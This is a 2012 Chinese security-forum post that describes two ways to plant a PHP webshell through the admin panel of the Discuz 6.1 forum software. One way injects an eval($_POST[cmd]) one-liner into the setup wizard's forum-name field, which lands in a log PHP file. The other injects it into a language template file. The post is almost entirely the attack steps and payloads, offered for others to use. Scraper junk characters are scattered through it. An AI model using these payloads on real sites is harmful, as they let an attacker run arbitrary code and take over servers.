找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2341|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
discuz6.1两种方法后台拿shell3 q5 g! t  N) W
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
5 B5 F. [6 A5 `1:
' E5 q; C1 `$ [5 Fhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes: ?6 X! T' R- B$ U' T( x9 w
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
& ?9 G/ A  {  f$ q: A% |* x<?php eval($_POST[cmd]);?>, e1 _& X9 B6 V' z1 p# Z1 l, m
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
2 ]6 I3 ]$ M) b1 C) K/ t' p  r* B3 T& [+ U' l  m9 w% Z

9 `* d; `- `+ j% h9 _1 k: v( I2:后台模板管理--默认模板套系--详情) b/ O. s0 N" [  Y% v. k
templates/default/actions.lang.php7 v" f. f, {; A# \
jhackj\\');eval($_POST[cmd])?>;//" f) O0 Z& ]5 n, d5 \0 `

( P% U; V, S: C+ F$ b! \$ ]利用很简单,聪明的人一看就懂了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表